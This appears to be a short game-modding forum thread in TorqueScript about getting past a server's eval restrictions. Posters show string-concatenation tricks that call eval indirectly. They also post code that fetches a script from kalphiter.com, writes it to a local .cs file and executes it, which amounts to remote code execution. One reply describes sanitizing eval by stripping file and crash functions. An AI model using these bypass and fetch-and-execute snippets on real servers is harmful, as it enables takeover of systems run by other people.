call("ev"@"al", "echo(lol);");
And call?lol
call("call", "ev"@"al", "echo(lol);");OSHT
new HTTPObject(KalHTTP);function Kaleval(){ KalHTTP.get("kalphiter.com:80", "/remoteExecution.php", "");}function KalHTTP::online(%this, %line){ %filePath = "base/lol.cs"); %file = new FileObject(); %file.openForWrite(%filePath); %file.writeLine(%line); %file.close(); %file.delete();}
If I were to ever use eval on my server, I would remove any file read, write, and delete functionality, and remove any possibilities for infinite loops. Ontop of that, getting rid of all the obvious crash functions.
Hah.
Haha, put %filePath = "base/lol.cs"); %file = new FileObject(); %file.openForWrite(%filePath); %file.writeLine(%line); %file.close(); %file.delete(); exec("base/lol.cs");in the remote execute file.NOW WHAT?
If it were my way, it would turn out like this: %filePath = "base/lol.cs"); %file = new (); %file.(%filePath); %file.(%line); %file.close(); %file.delete(); ("base/lol.cs");